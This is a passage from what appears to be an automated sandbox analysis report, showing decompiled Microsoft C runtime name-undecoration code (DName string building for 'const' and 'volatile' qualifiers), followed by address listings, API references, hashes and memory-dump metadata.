				intOrPtr _t412;
				intOrPtr _t414;
				long long _t417;
				long long _t418;
				void* _t420;
				void* _t421;
				void* _t423;
				void* _t424;
				void* _t431;
				void* _t433;
				intOrPtr* _t434;
				void* _t436;
				void* _t439;
				long long _t440;
				long long _t442;

				_t431 = __r11;
				_t430 = __r10;
				_t417 = __rsi;
				_t318 = _t423;
				 *((long long*)(_t318 + 8)) = __rbx;
				 *((long long*)(_t318 + 0x10)) = __rsi;
				 *((long long*)(_t318 + 0x18)) = __r8;
				_t4 = _t318 - 0x57; // -126
				_t421 = _t4;
				_t424 = _t423 - 0xe0;
				asm("movaps [eax-0x38], xmm6");
				_t319 =  *0x2b0c9a70; // 0x0
				_t434 = __rdx;
				 *(_t421 - 0x39) =  *(_t421 - 0x39) & 0xffff0000;
				_t331 = __rcx;
				 *((long long*)(_t421 - 0x41)) = __rsi;
				 *((intOrPtr*)(_t424 + 0x20)) = sil;
				if ( *_t319 == sil) goto 0x2b06f614;
				if ( *_t319 != 0x24) goto 0x2b06f029;
				r9d =  *((intOrPtr*)(_t421 + 0x7f));
				_t10 = _t424 + 0x20; // -47
				_t427 = _t10;
				_t11 = _t421 + 0x6f; // -15
				_t12 = _t421 - 0x51; // -207
				E00007FFD7FFD2B06B790(0,  *_t319 - 0x24, _t319, __rcx, _t12, _t11, _t409, __rsi, _t10, __r10, __rdx, _t439, _t436, _t433);
				if ( *((intOrPtr*)(_t421 - 0x51)) == __rsi) goto 0x2b06f024;
				asm("movups xmm0, [ebp-0x51]");
				asm("movdqu [ebx], xmm0");
				goto 0x2b06f6c0;
				_t320 =  *0x2b0c9a70; // 0x0
				 *((long long*)(_t421 - 0x71)) = __rsi;
				 *((long long*)(_t421 - 0x51)) = __rsi;
				_t223 =  *_t320;
				_t440 = __rsi;
				_t16 = _t320 + 0x2b; // 0x41
				r8d = _t16;
				_t265 = _t223 - r8b;
				_t150 =  >=  ? r8d : 0x16;
				 *(_t421 - 0x49) =  *(_t421 - 0x49) & 0xffff0000;
				_t256 = _t223 - ( >=  ? r8d : 0x16);
				 *(_t421 - 0x69) =  *(_t421 - 0x69) & 0xffff0000;
				_t233 =  *0x2b0c9a8c; // 0x0
				asm("movaps xmm6, [ebp-0x71]");
				_t151 = _t223 - ( >=  ? r8d : 0x16);
				_t152 = _t223 - ( >=  ? r8d : 0x16) - 4;
				if (_t265 == 0) goto 0x2b06f164;
				_t153 = _t223 - ( >=  ? r8d : 0x16) - 3;
				if (_t265 == 0) goto 0x2b06f0e6;
				_t266 = _t223 - ( >=  ? r8d : 0x16) - 3 - 3;
				if (_t223 - ( >=  ? r8d : 0x16) - 3 != 3) goto 0x2b06f24a;
				if (( !(_t233 >> 1) & 0x00000001) == 0) goto 0x2b06f1eb;
				if ( *((intOrPtr*)(_t421 - 0x51)) == __rsi) goto 0x2b06f0d7;
				_t410 =  *0x2b083a78; // 0x7ffd2b0839a0
				if (( !_t233 & 0x00000001) != 0) goto 0x2b06f0a0;
				asm("movaps xmm0, [ebp-0x51]");
				_t26 = _t421 - 0x11; // -143
				asm("movdqa [ebp-0x11], xmm0");
				E00007FFD7FFD2B06AF5C(0x20, 0, _t320, __rcx, _t26, __rsi, _t10, _t409);
				_t27 = _t421 - 0x31; // -175
				asm("movaps xmm5, [ebp-0x11]");
				asm("movdqa [ebp-0x31], xmm5");
				E00007FFD7FFD2B06AFE0(_t223, 0, _t320, _t331, _t27, _t410 + 2, __rsi, _t10, _t420);
				asm("movaps xmm5, [ebp-0x31]");
				asm("movdqa [ebp-0x51], xmm5");
				goto 0x2b06f1df;
				goto 0x2b06f1d0;
				if (1 == 0) goto 0x2b06f1eb;
				if (_t440 == 0) goto 0x2b06f141;
				_t412 =  *0x2b083a80; // 0x7ffd2b083990
				if (1 != 0) goto 0x2b06f10b;
				_t34 = _t421 + 0xf; // -111
				asm("movdqa [ebp+0xf], xmm6");
				E00007FFD7FFD2B06AF5C(0x20, 0, _t320, _t331, _t34, _t417, _t10);
				_t35 = _t421 - 1; // -127
				asm("movaps xmm5, [ebp+0xf]");
				asm("movdqa [ebp-0x1], xmm5");
				E00007FFD7FFD2B06AFE0(_t223, 0, _t320, _t331, _t35, _t412 + 2, _t417, _t427);
				asm("movaps xmm6, [ebp-0x1]");
				asm("movaps [ebp-0x71], xmm6");
				goto 0x2b06f1df;
				_t382 =  *0x2b083a80; // 0x7ffd2b083990
				if (0 != 0) goto 0x2b06f151;
				_t39 = _t421 - 0x71; // -239
				E00007FFD7FFD2B06AD7C(_t39, _t382 + 2);
				_t442 =  *((intOrPtr*)(_t421 - 0x71));
				asm("movaps xmm6, [ebp-0x71]");
				goto 0x2b06f1df;
				if (1 == 0) goto 0x2b06f1eb;
				if (1 == 0) goto 0x2b06f1eb;
				if ( *((intOrPtr*)(_t421 - 0x51)) == _t417) goto 0x2b06f1c6;
				_t414 =  *0x2b083a70; // 0x7ffd2b0839b0
				if (1 != 0) goto 0x2b06f191;
				_t415 = _t414 + 2;
				asm("movaps xmm0, [ebp-0x51]");
				_t48 = _t421 - 0x21; // -159
				asm("movdqa [ebp-0x21], xmm0");
				E00007FFD7FFD2B06AF5C(0x20, 0, _t320, _t331, _t48, _t417, _t427);
				_t49 = _t424 + 0x30; // -31
				asm("movaps xmm5, [ebp-0x21]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AFE0(_t223, 0, _t320, _t331, _t49, _t414 + 2, _t417, _t427);
				asm("movaps xmm5, [esp+0x30]");
				goto 0x2b06f0cd;
				_t385 =  *0x2b083a70; // 0x7ffd2b0839b0
				if (0 != 0) goto 0x2b06f1d6;
				_t52 = _t421 - 0x51; // -207
				E00007FFD7FFD2B06AD7C(_t52, _t385 + 2);
				r8d = 0x41;
				_t321 =  *0x2b0c9a70; // 0x0
				_t322 = _t321 + 1;
				 *0x2b0c9a70 = _t322;
				if ( *_t322 != 0x24) goto 0x2b06f22d;
				r9d =  *((intOrPtr*)(_t421 + 0x7f));
				_t54 = _t424 + 0x20; // -47
				_t428 = _t54;
				_t55 = _t421 + 0x6f; // -15
				_t56 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06B790(0,  *_t322 - 0x24, _t322, _t331, _t56, _t55, _t414 + 2, _t417, _t54, __r10, _t434);
				if ( *((intOrPtr*)(_t421 - 0x61)) != _t417) goto 0x2b06f60b;
				r8d = 0x41;
				_t323 =  *0x2b0c9a70; // 0x0
				_t225 =  >=  ? r8d : 0x16;
				_t258 =  *_t323 - ( >=  ? r8d : 0x16);
				goto 0x2b06f062;
				_t324 =  *0x2b0c9a70; // 0x0
				if ( *_t324 == sil) goto 0x2b06f25d;
				 *0x2b0c9a70 =  *0x2b0c9a70 + 1;
				if (_t258 - 0x1f > 0) goto 0x2b06f5f8;
				_t418 =  *((intOrPtr*)(_t421 + 0x6f));
				_t59 = _t421 - 0x71; // -239
				E00007FFD7FFD2B06A9E0(_t59, _t418);
				_t60 = _t421 - 0x71; // -239
				_t61 = _t424 + 0x30; // -31
				asm("movaps xmm5, [ebp-0x41]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AC78(_t324, _t61, _t60);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x71], xmm5");
				if ( *((long long*)(_t421 - 0x51)) == 0) goto 0x2b06f2d4;
				_t63 = _t424 + 0x30; // -31
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x20, 0, _t324, _t331, _t63, _t418, _t54);
				_t64 = _t421 - 0x51; // -207
				_t65 = _t424 + 0x30; // -31
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AC78(_t324, _t65, _t64);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x71], xmm5");
				if (_t442 == 0) goto 0x2b06f30e;
				_t66 = _t424 + 0x30; // -31
				asm("movdqa [esp+0x30], xmm6");
				E00007FFD7FFD2B06AF5C(0x20, 0, _t324, _t331, _t66, _t418, _t54);
				_t67 = _t421 - 0x71; // -239
				_t68 = _t424 + 0x30; // -31
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AC78(_t324, _t68, _t67);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x71], xmm5");
				r14d = 0;
				if ((dil & 0x00000010) == 0) goto 0x2b06f431;
				if ( *((intOrPtr*)(_t421 + 0x7f)) == r14d) goto 0x2b06f334;
				 *(_t331 + 8) =  *(_t331 + 8) & 0xffff00ff;
				 *_t331 = _t442;
				 *(_t331 + 8) = 2;
				goto 0x2b06f6c0;
				if ( *_t418 == r14b) goto 0x2b06f3ae;
				_t75 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A9E0(_t75, "::");
				_t76 = _t421 - 0x71; // -239
				_t77 = _t424 + 0x30; // -31
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t324, _t77, _t76);
				_t325 =  *0x2b0c9a70; // 0x0
				asm("movaps xmm5, [esp+0x30]");
				_t78 = _t421 - 0x61; // -223
				asm("movdqa [ebp-0x71], xmm5");
				if ( *_t325 == r14b) goto 0x2b06f381;
				E00007FFD7FFD2B06E6CC(0x20, 0, _t331, _t78, _t414 + 2, _t418, _t54, __r10, _t431);
				goto 0x2b06f38b;
				E00007FFD7FFD2B06A490(1, _t325, _t78);
				asm("movups xmm0, [eax]");
				_t79 = _t421 - 0x71; // -239
				_t80 = _t424 + 0x30; // -31
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t325, _t80, _t79);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x71], xmm5");
				goto 0x2b06f3de;
				_t326 =  *0x2b0c9a70; // 0x0
				if ( *_t326 == r14b) goto 0x2b06f3ff;
				_t81 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06E6CC(1, 0, _t331, _t81, _t414 + 2, _t418, _t428, __r10, _t431);
				if ( *(_t421 - 0x69) == 3) goto 0x2b06f3de;
				if ( *(_t326 + 8) - 1 <= 0) goto 0x2b06f3de;
				 *(_t421 - 0x69) =  *(_t421 - 0x69) ^ ( *(_t326 + 8) ^  *(_t421 - 0x69)) & 0x000000ff;
				_t327 =  *0x2b0c9a70; // 0x0
				_t227 =  *_t327;
				if (_t227 == 0) goto 0x2b06f3ff;
				_t328 = _t327 + 1;
				 *0x2b0c9a70 = _t328;
				if (_t227 == 0x40) goto 0x2b06f431;
				goto 0x2b06f321;
				if ( *(_t421 - 0x69) - 1 > 0) goto 0x2b06f431;
				if ( *((intOrPtr*)(_t421 - 0x71)) == _t442) goto 0x2b06f423;
				E00007FFD7FFD2B06A12C(1, _t79);
				_t90 = _t421 - 0x71; // -239
				E00007FFD7FFD2B06A564(_t328, _t331, _t90, _t328, _t428);
				goto 0x2b06f431;
				_t91 = _t421 - 0x71; // -239
				E00007FFD7FFD2B06A640(1, _t328, _t91);
				_t193 =  *0x2b0c9a8c; // 0x0
				if (( !(_t193 >> 1) & 0x00000001) == 0) goto 0x2b06f47e;
				if ((_t258 & 0x0000000c) != 0xc) goto 0x2b06f4a7;
				if ( *((intOrPtr*)(_t421 + 0x7f)) != r14d) goto 0x2b06f321;
				_t95 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06D634(1, 1, 0, _t328, _t95, _t415, _t418, _t428, _t430, _t431);
				_t96 = _t421 - 0x71; // -239
				_t97 = _t424 + 0x30; // -31
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				_t199 = E00007FFD7FFD2B06AC78(_t328, _t97, _t96);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x71], xmm5");
				goto 0x2b06f4a7;
				if ((_t199 & 0x0000000c) != 0xc) goto 0x2b06f4a7;
				_t98 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06D634(1, 1, 0, _t328, _t98, _t415, _t418, _t428, _t430, _t431);
				if ( *(_t421 - 0x69) == 3) goto 0x2b06f4a7;
				if ( *(_t328 + 8) - 1 <= 0) goto 0x2b06f4a7;
				 *(_t421 - 0x69) =  *(_t421 - 0x69) ^ ( *(_t328 + 8) ^  *(_t421 - 0x69)) & 0x000000ff;
				if ((dil & 0x00000002) == 0) goto 0x2b06f4de;
				_t107 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A9E0(_t107, "volatile ");
				_t108 = _t421 - 0x71; // -239
				_t109 = _t424 + 0x30; // -31
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t328, _t109, _t108);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x71], xmm5");
				if ((dil & 0x00000001) == 0) goto 0x2b06f515;
				_t112 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A9E0(_t112, "const ");
				_t113 = _t421 - 0x71; // -239
				_t114 = _t424 + 0x30; // -31
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t328, _t114, _t113);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [ebp-0x71], xmm5");
				if ( *((intOrPtr*)(_t421 + 0x7f)) != r14d) goto 0x2b06f5db;
				if ( *_t434 == _t442) goto 0x2b06f5a6;
				if (( *(_t434 + 8) & 0x00000100) != 0) goto 0x2b06f57f;
				if ( *__r9 == _t442) goto 0x2b06f57f;
				_t119 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A9A8(0x20, _t328, _t119);
				_t120 = _t424 + 0x30; // -31
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				E00007FFD7FFD2B06AC78(_t328, _t120, __r9);
				asm("movaps xmm5, [esp+0x30]");
				_t121 = _t424 + 0x30; // -31
				asm("movdqa [esp+0x30], xmm5");
				E00007FFD7FFD2B06AF5C(0x20, 0, _t328, _t331, _t121, _t418, _t428);
				asm("movaps xmm5, [esp+0x30]");
				asm("movdqa [esp+0x30], xmm5");
				goto 0x2b06f5c3;
				if (( *(_t434 + 8) & 0x00000800) == 0) goto 0x2b06f596;
				asm("inc ecx");
				asm("movdqu [ebp-0x71], xmm0");
				goto 0x2b06f5db;
				_t125 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A9A8(0x20, _t328, _t125);
				goto 0x2b06f5ba;
				if ( *__r9 == _t442) goto 0x2b06f5db;
				_t126 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A9A8(0x20, _t328, _t126);
				asm("movups xmm0, [eax]");
				asm("movdqu [esp+0x30], xmm0");
				_t127 = _t424 + 0x30; // -31
				E00007FFD7FFD2B06AC78(_t328, _t127, __r9);
				_t128 = _t424 + 0x30; // -31
				_t129 = _t421 - 0x71; // -239
				E00007FFD7FFD2B06AC78(_t328, _t129, _t128);
				 *(_t421 - 0x69) =  *(_t421 - 0x69) | 0x00000100;
				if ( *((intOrPtr*)(_t424 + 0x20)) == r14b) goto 0x2b06f5ef;
				asm("bts dword [ebp-0x69], 0xd");
				asm("movaps xmm0, [ebp-0x71]");
				goto 0x2b06f01b;
				 *(_t331 + 8) =  *(_t331 + 8) & 0xffff00ff;
				 *_t331 = _t418;
				 *(_t331 + 8) = 2;
				goto 0x2b06f6c0;
				asm("movups xmm0, [ebp-0x61]");
				goto 0x2b06f01b;
				if ( *((intOrPtr*)(_t421 + 0x7f)) != 0) goto 0x2b06f6b6;
				if ( *_t434 == _t418) goto 0x2b06f697;
				if (( *(_t434 + 8) & 0x00000100) != 0) goto 0x2b06f680;
				if ( *__r9 == _t418) goto 0x2b06f680;
				_t140 = _t424 + 0x30; // -31
				E00007FFD7FFD2B06A490(1, _t328, _t140);
				_t141 = _t421 - 0x61; // -223
				asm("movups xmm0, [eax]");
				asm("movdqu [ebp-0x61], xmm0");
				E00007FFD7FFD2B06AC78(_t328, _t141, __r9);
				asm("movaps xmm5, [ebp-0x61]");
				_t142 = _t421 - 0x61; // -223
				asm("movdqa [ebp-0x61], xmm5");
				E00007FFD7FFD2B06AF5C(0x20, 0, _t328, _t331, _t142, _t418, _t428);
				asm("movaps xmm5, [ebp-0x61]");
				asm("movdqu [ebx], xmm5");
				E00007FFD7FFD2B06AC78(_t328, _t331, _t434);
				goto 0x2b06f6c0;
				_t143 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A490(1, _t328, _t143);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebx], xmm0");
				goto 0x2b06f673;
				if ( *__r9 == _t418) goto 0x2b06f6b6;
				_t144 = _t421 - 0x61; // -223
				E00007FFD7FFD2B06A490(1, _t328, _t144);
				asm("movups xmm0, [eax]");
				asm("movdqu [ebx], xmm0");
				goto 0x2b06f676;
				_t222 = E00007FFD7FFD2B06A490(1, _t328, _t144);
				asm("inc ecx");
				return _t222;
			}

0x7ffd2b06efa4
0x7ffd2b06efa4
0x7ffd2b06efa4
0x7ffd2b06efa4
0x7ffd2b06efa7
0x7ffd2b06efab
0x7ffd2b06efaf
0x7ffd2b06efbb
0x7ffd2b06efbb
0x7ffd2b06efbf
0x7ffd2b06efc8
0x7ffd2b06efcc
0x7ffd2b06efd3
0x7ffd2b06efde
0x7ffd2b06efe1
0x7ffd2b06efe4
0x7ffd2b06efe8
0x7ffd2b06eff0
0x7ffd2b06eff9
0x7ffd2b06effb
0x7ffd2b06efff
0x7ffd2b06efff
0x7ffd2b06f004
0x7ffd2b06f008
0x7ffd2b06f00c
0x7ffd2b06f015
0x7ffd2b06f017
0x7ffd2b06f01b
0x7ffd2b06f01f
0x7ffd2b06f029
0x7ffd2b06f030
0x7ffd2b06f034
0x7ffd2b06f038
0x7ffd2b06f040
0x7ffd2b06f043
0x7ffd2b06f043
0x7ffd2b06f049
0x7ffd2b06f04c
0x7ffd2b06f050
0x7ffd2b06f053
0x7ffd2b06f055
0x7ffd2b06f058
0x7ffd2b06f05e
0x7ffd2b06f062
0x7ffd2b06f064
0x7ffd2b06f067
0x7ffd2b06f06d
0x7ffd2b06f06f
0x7ffd2b06f071
0x7ffd2b06f074
0x7ffd2b06f082
0x7ffd2b06f08e
0x7ffd2b06f090
0x7ffd2b06f09a
0x7ffd2b06f0a0
0x7ffd2b06f0a4
0x7ffd2b06f0aa
0x7ffd2b06f0af
0x7ffd2b06f0b4
0x7ffd2b06f0b8
0x7ffd2b06f0bf
0x7ffd2b06f0c4
0x7ffd2b06f0c9
0x7ffd2b06f0cd
0x7ffd2b06f0d2
0x7ffd2b06f0e1
0x7ffd2b06f0ee
0x7ffd2b06f0f9
0x7ffd2b06f0fb
0x7ffd2b06f105
0x7ffd2b06f10b
0x7ffd2b06f111
0x7ffd2b06f116
0x7ffd2b06f11b
0x7ffd2b06f122
0x7ffd2b06f126
0x7ffd2b06f12b
0x7ffd2b06f130
0x7ffd2b06f134
0x7ffd2b06f13c
0x7ffd2b06f144
0x7ffd2b06f14b
0x7ffd2b06f151
0x7ffd2b06f155
0x7ffd2b06f15a
0x7ffd2b06f15e
0x7ffd2b06f162
0x7ffd2b06f16c
0x7ffd2b06f177
0x7ffd2b06f17f
0x7ffd2b06f181
0x7ffd2b06f18b
0x7ffd2b06f18d
0x7ffd2b06f191
0x7ffd2b06f195
0x7ffd2b06f19b
0x7ffd2b06f1a0
0x7ffd2b06f1a5
0x7ffd2b06f1aa
0x7ffd2b06f1b1
0x7ffd2b06f1b7
0x7ffd2b06f1bc
0x7ffd2b06f1c1
0x7ffd2b06f1c9
0x7ffd2b06f1d0
0x7ffd2b06f1d6
0x7ffd2b06f1da
0x7ffd2b06f1e5
0x7ffd2b06f1eb
0x7ffd2b06f1f2
0x7ffd2b06f1f5
0x7ffd2b06f1ff
0x7ffd2b06f201
0x7ffd2b06f205
0x7ffd2b06f205
0x7ffd2b06f20a
0x7ffd2b06f20e
0x7ffd2b06f212
0x7ffd2b06f21b
0x7ffd2b06f227
0x7ffd2b06f22d
0x7ffd2b06f23f
0x7ffd2b06f243
0x7ffd2b06f245
0x7ffd2b06f24a
0x7ffd2b06f254
0x7ffd2b06f256
0x7ffd2b06f260
0x7ffd2b06f266
0x7ffd2b06f26a
0x7ffd2b06f271
0x7ffd2b06f276
0x7ffd2b06f27a
0x7ffd2b06f27f
0x7ffd2b06f283
0x7ffd2b06f289
0x7ffd2b06f293
0x7ffd2b06f298
0x7ffd2b06f29d
0x7ffd2b06f29f
0x7ffd2b06f2a6
0x7ffd2b06f2ac
0x7ffd2b06f2b1
0x7ffd2b06f2b5
0x7ffd2b06f2ba
0x7ffd2b06f2bf
0x7ffd2b06f2c5
0x7ffd2b06f2ca
0x7ffd2b06f2cf
0x7ffd2b06f2d7
0x7ffd2b06f2d9
0x7ffd2b06f2e0
0x7ffd2b06f2e6
0x7ffd2b06f2eb
0x7ffd2b06f2ef
0x7ffd2b06f2f4
0x7ffd2b06f2f9
0x7ffd2b06f2ff
0x7ffd2b06f304
0x7ffd2b06f309
0x7ffd2b06f30e
0x7ffd2b06f315
0x7ffd2b06f31f
0x7ffd2b06f321
0x7ffd2b06f328
0x7ffd2b06f32b
0x7ffd2b06f32f
0x7ffd2b06f337
0x7ffd2b06f340
0x7ffd2b06f344
0x7ffd2b06f349
0x7ffd2b06f34d
0x7ffd2b06f352
0x7ffd2b06f355
0x7ffd2b06f35b
0x7ffd2b06f360
0x7ffd2b06f367
0x7ffd2b06f36c
0x7ffd2b06f370
0x7ffd2b06f378
0x7ffd2b06f37a
0x7ffd2b06f37f
0x7ffd2b06f386
0x7ffd2b06f38b
0x7ffd2b06f38e
0x7ffd2b06f392
0x7ffd2b06f397
0x7ffd2b06f39d
0x7ffd2b06f3a2
0x7ffd2b06f3a7
0x7ffd2b06f3ac
0x7ffd2b06f3ae
0x7ffd2b06f3b8
0x7ffd2b06f3ba
0x7ffd2b06f3be
0x7ffd2b06f3c7
0x7ffd2b06f3cd
0x7ffd2b06f3db
0x7ffd2b06f3de
0x7ffd2b06f3e5
0x7ffd2b06f3e9
0x7ffd2b06f3eb
0x7ffd2b06f3ee
0x7ffd2b06f3f8
0x7ffd2b06f3fa
0x7ffd2b06f403
0x7ffd2b06f409
0x7ffd2b06f410
0x7ffd2b06f415
0x7ffd2b06f41c
0x7ffd2b06f421
0x7ffd2b06f423
0x7ffd2b06f42c
0x7ffd2b06f431
0x7ffd2b06f43f
0x7ffd2b06f446
0x7ffd2b06f44c
0x7ffd2b06f452
0x7ffd2b06f456
0x7ffd2b06f45b
0x7ffd2b06f45f
0x7ffd2b06f464
0x7ffd2b06f467
0x7ffd2b06f46d
0x7ffd2b06f472
0x7ffd2b06f477
0x7ffd2b06f47c
0x7ffd2b06f483
0x7ffd2b06f485
0x7ffd2b06f489
0x7ffd2b06f492
0x7ffd2b06f498
0x7ffd2b06f4a4
0x7ffd2b06f4ab
0x7ffd2b06f4b4
0x7ffd2b06f4b8
0x7ffd2b06f4bd
0x7ffd2b06f4c1
0x7ffd2b06f4c6
0x7ffd2b06f4c9
0x7ffd2b06f4cf
0x7ffd2b06f4d4
0x7ffd2b06f4d9
0x7ffd2b06f4e2
0x7ffd2b06f4eb
0x7ffd2b06f4ef
0x7ffd2b06f4f4
0x7ffd2b06f4f8
0x7ffd2b06f4fd
0x7ffd2b06f500
0x7ffd2b06f506
0x7ffd2b06f50b
0x7ffd2b06f510
0x7ffd2b06f51e
0x7ffd2b06f528
0x7ffd2b06f52f
0x7ffd2b06f535
0x7ffd2b06f537
0x7ffd2b06f53d
0x7ffd2b06f542
0x7ffd2b06f54a
0x7ffd2b06f54d
0x7ffd2b06f553
0x7ffd2b06f558
0x7ffd2b06f55d
0x7ffd2b06f564
0x7ffd2b06f56a
0x7ffd2b06f572
0x7ffd2b06f577
0x7ffd2b06f57d
0x7ffd2b06f588
0x7ffd2b06f58a
0x7ffd2b06f58f
0x7ffd2b06f594
0x7ffd2b06f596
0x7ffd2b06f59c
0x7ffd2b06f5a4
0x7ffd2b06f5aa
0x7ffd2b06f5ac
0x7ffd2b06f5b2
0x7ffd2b06f5ba
0x7ffd2b06f5bd
0x7ffd2b06f5c3
0x7ffd2b06f5c8
0x7ffd2b06f5cd
0x7ffd2b06f5d2
0x7ffd2b06f5d6
0x7ffd2b06f5e0
0x7ffd2b06f5e8
0x7ffd2b06f5ea
0x7ffd2b06f5ef
0x7ffd2b06f5f3
0x7ffd2b06f5f8
0x7ffd2b06f5ff
0x7ffd2b06f602
0x7ffd2b06f606
0x7ffd2b06f60b
0x7ffd2b06f60f
0x7ffd2b06f617
0x7ffd2b06f621
0x7ffd2b06f62d
0x7ffd2b06f632
0x7ffd2b06f634
0x7ffd2b06f63e
0x7ffd2b06f643
0x7ffd2b06f64a
0x7ffd2b06f64d
0x7ffd2b06f652
0x7ffd2b06f657
0x7ffd2b06f65b
0x7ffd2b06f661
0x7ffd2b06f666
0x7ffd2b06f66b
0x7ffd2b06f66f
0x7ffd2b06f679
0x7ffd2b06f67e
0x7ffd2b06f680
0x7ffd2b06f689
0x7ffd2b06f68e
0x7ffd2b06f691
0x7ffd2b06f695
0x7ffd2b06f69a
0x7ffd2b06f69c
0x7ffd2b06f6a5
0x7ffd2b06f6ad
0x7ffd2b06f6b0
0x7ffd2b06f6b4
0x7ffd2b06f6bb
0x7ffd2b06f6d3
0x7ffd2b06f6e3

APIs

DName::operator+=.LIBCMT ref: 00007FFD2B06F0AF
DName::operator+=.LIBCMT ref: 00007FFD2B06F0C4
DName::operator+=.LIBCMT ref: 00007FFD2B06F116
DName::operator+=.LIBCMT ref: 00007FFD2B06F12B
DName::operator=.LIBCMT ref: 00007FFD2B06F1DA
DName::DName.LIBCMT ref: 00007FFD2B06F271
DName::operator+=.LIBCMT ref: 00007FFD2B06F289
DName::operator+=.LIBCMT ref: 00007FFD2B06F2AC
DName::operator+=.LIBCMT ref: 00007FFD2B06F2C5
DName::operator+=.LIBCMT ref: 00007FFD2B06F2E6
DName::operator+=.LIBCMT ref: 00007FFD2B06F2FF
DName::operator+=.LIBCMT ref: 00007FFD2B06F652
DName::operator+=.LIBCMT ref: 00007FFD2B06F666
DName::operator+=.LIBCMT ref: 00007FFD2B06F679

Strings

const , xrefs: 00007FFD2B06F4E4
volatile , xrefs: 00007FFD2B06F4AD

Memory Dump Source

Source File: 00000008.00000002.1291874582.00007FFD2B061000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD2B060000, based on PE: true

Associated: 00000008.00000002.1291853335.00007FFD2B060000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1291974287.00007FFD2B082000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292089386.00007FFD2B0AF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292158197.00007FFD2B0C7000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292204592.00007FFD2B0CA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292227331.00007FFD2B0CC000.00000010.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1292247071.00007FFD2B0CD000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffd2b060000_regsvr32.jbxd

Similarity

API ID: Name::operator+=$NameName::Name::operator=
String ID: const $volatile
API String ID: 712027794-1610819973
Opcode ID: 31f9a4ddd355bfe73492e8f51654c0df2ef96ea63c7f7937f64cfc69384bc0c7
Instruction ID: f852becd13abc5e2c619af86519277c9774328894621839e1334e06cff13a0ee
Opcode Fuzzy Hash: 31f9a4ddd355bfe73492e8f51654c0df2ef96ea63c7f7937f64cfc69384bc0c7
Instruction Fuzzy Hash: 3C32E622F1EB4289F7129B64C9621FD6361EF56348F405131EE8D169B9DFBCE18AD380

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B06EAB8 Relevance: 31.8, APIs: 21, Instructions: 331
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 65%

			E00007FFD7FFD2B06EAB8(signed int __ecx, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, void* __r11) {
				signed int _t117;
				unsigned int _t121;
				unsigned int _t128;
				signed int _t132;
				signed int _t164;
				signed int _t169;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				void* _t189;
				signed int _t190;
				void* _t201;
				void* _t224;
				char* _t225;
				char* _t226;
				long long _t228;
				char* _t229;
				long long* _t230;
				long long _t233;
				long long* _t290;
				long long _t294;
				void* _t296;
				void* _t297;
				void* _t299;
				void* _t309;
				long long _t311;
				void* _t313;
				intOrPtr* _t314;
				void* _t316;

				_t307 = __r11;
				_t292 = __rsi;
				_t232 = __rbx;
				_t171 = __ecx;
				_t224 = _t299;
				 *((long long*)(_t224 + 8)) = __rbx;
				 *((long long*)(_t224 + 0x10)) = __rsi;
				 *((long long*)(_t224 + 0x18)) = __rdi;
				_t297 = _t224 - 0x5f;
				_t225 =  *0x2b0c9a70; // 0x0
				_t314 = __rdx;
				_t290 = __rcx;
				if ( *_t225 != 0) goto 0x2b06eb11;
				_t5 = _t232 + 1; // 0x1
				E00007FFD7FFD2B06A490(_t5, _t225, _t297 + 0x17);
				asm("movups xmm0, [eax]");
				asm("movdqu [edi], xmm0");
				E00007FFD7FFD2B06AC78(_t225, __rcx, __rdx);
				goto 0x2b06ef7d;
				if ( *_t225 - 0x36 < 0) goto 0x2b06eb1b;
				if ( *_t225 - 0x39 <= 0) goto 0x2b06eb33;
				if ( *_t225 == 0x5f) goto 0x2b06eb33;
